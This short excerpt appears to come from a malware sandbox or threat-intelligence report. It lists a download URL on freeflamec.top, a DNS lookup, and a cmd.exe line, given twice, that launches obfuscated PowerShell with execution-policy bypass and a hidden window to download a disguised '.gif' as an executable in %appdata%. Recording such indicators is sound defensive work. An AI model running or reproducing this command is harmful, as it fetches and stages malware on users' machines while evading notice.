Technical Information
- http://www.freeflamec.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poweRSHell.eXe -execuTiONpOLicy bYPAss -NOPROFile -wINDowSTyle HiddeN (New-ObjeCt SYstEM.nEt.weBCliEnt).DoWNLOaDfILE('http://www.freeflamec.top/read.php?f=1.gif','%apPDATa%.Exe')...
- DNS ASK fr###lamec.top
- '<SYSTEM32>\cmd.exe' /C "poweRSHell.eXe -execuTiONpOLicy bYPAss -NOPROFile -wINDowSTyle HiddeN (New-ObjeCt SYstEM.nEt.weBCliEnt).DoWNLOaDfILE('http://www.freeflamec.top/read.php?f=1.gif','%apPDATa%.Exe')...' (with hidden window)